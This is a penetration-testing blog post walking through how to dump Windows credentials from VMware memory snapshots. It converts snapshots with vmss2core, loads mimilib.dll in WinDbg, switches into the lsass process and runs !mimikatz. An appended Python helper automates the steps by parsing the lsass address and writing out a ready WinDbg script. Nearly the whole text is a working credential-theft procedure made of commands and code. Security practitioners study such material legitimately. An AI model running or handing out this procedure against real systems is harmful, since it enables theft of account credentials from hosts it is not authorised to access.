Mimikatz Against Virtual Machine Memory Part 2


Short update, mostly about performing the actions from Part 1 on Windows 8+ and Windows Server 2012.

First issue was symbols in WinDbg. Most importantly, NO symbols for WinDbg. I found this article that lets you download them remotely:

Use the Microsoft Symbol Server to obtain debug symbol files

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........

Second issue was creating the dmp file. I tried Volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with WinDbg for Windows 8 or Windows 2012. What did work was VMware's vmss2core utility.

[screenshot: vmss2core command line]

Note: for VMware Workstation/Fusion you need to pass it the .vmsn and .vmem files (shown above).

For VMware ESXi I just needed to pass the .vmsn file.

The rest follows the same flow as the previous post:

1. Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
SessionId: 0 Cid: 01e8 Peb: 7ff623aac000 ParentCid: 0194
DirBase: 06291000 ObjectTable: ffffc001f8f0c400 HandleCount:
Image: lsass.exe

5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................

6. Run Mimikatz

kd> !mimikatz

[screenshot: !mimikatz output]

7. Drink Beers

Posted by CG at 11:45 AM

Source: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2
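As an added example (not from the original post or the blog it quotes), a small Python helper for an analyst reproducing steps 2 to 6 above against a snapshot: it parses the `!process 0 0 lsass.exe` output for the EPROCESS address, checks that the value is a plausible 64-bit kernel address, and renders the WinDbg commands as a script file. The sample kd output, the symbol cache path `f:\localsymbols` and the mimilib path are constructed values modelled on the transcript above; the output shape of `!process` is assumed to match that transcript.

```python
import re
from typing import Optional

# Constructed sample of `!process 0 0 lsass.exe` output, modelled on the
# transcript in the post (assumption: real output keeps this PROCESS/Image: shape).
SAMPLE_PROCESS_OUTPUT = """\
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount: <Data Not Accessible>
    Image: lsass.exe
"""

IMAGE_RE = re.compile(r"^\s*Image:\s*(\S+)", re.MULTILINE)
ADDR_RE = re.compile(r"([0-9a-fA-F`]+)")


def find_eprocess(output: str, image: str = "lsass.exe") -> Optional[str]:
    """Return the EPROCESS address for `image` from `!process 0 0 <image>` output.

    kd prints one block per matching process, each starting with a PROCESS line
    and containing an Image: line. The first block whose image name matches wins.
    The backtick kd inserts into some 64-bit addresses (ffffe001`12f08080) is dropped.
    """
    for block in output.split("PROCESS ")[1:]:
        m_addr = ADDR_RE.match(block)
        m_img = IMAGE_RE.search(block)
        if m_addr and m_img and m_img.group(1).lower() == image.lower():
            return m_addr.group(1).replace("`", "")
    return None


def is_kernel_address(addr: str) -> bool:
    """True if `addr` is a 16-hex-digit value in the x64 kernel half of the address space.

    Guards against feeding a user-mode value (e.g. the Peb) to `.process /r /p`.
    """
    clean = addr.replace("`", "")
    if not re.fullmatch(r"[0-9a-fA-F]{16}", clean):
        return False
    return int(clean, 16) >= 0xFFFF800000000000


def build_windbg_script(eprocess: str, symbol_cache: str, mimilib_path: str) -> str:
    """Render the post's steps 2-6 as a WinDbg script (run it with $$><script.txt).

    symbol_cache is the local directory in the SRV*<cache>*<url> symbol path form.
    """
    if not is_kernel_address(eprocess):
        raise ValueError(f"{eprocess!r} does not look like a 64-bit kernel address")
    sympath = f"SRV*{symbol_cache}*http://msdl.microsoft.com/download/symbols"
    lines = [
        f".sympath {sympath}",          # step 2: fix symbols
        ".reload",
        f".load {mimilib_path}",        # step 3: load mimilib
        f".process /r /p {eprocess}",   # step 5: switch to lsass, reload user symbols
        "!mimikatz",                    # step 6
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    addr = find_eprocess(SAMPLE_PROCESS_OUTPUT)
    print(build_windbg_script(addr, r"f:\localsymbols", r"C:\users\user\desktop\mimilib.dll"))
```

Step 4 (`!process 0 0 lsass.exe`) stays interactive: its output is what you paste into `find_eprocess`, and the generated script then carries the address through to `.process /r /p`.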
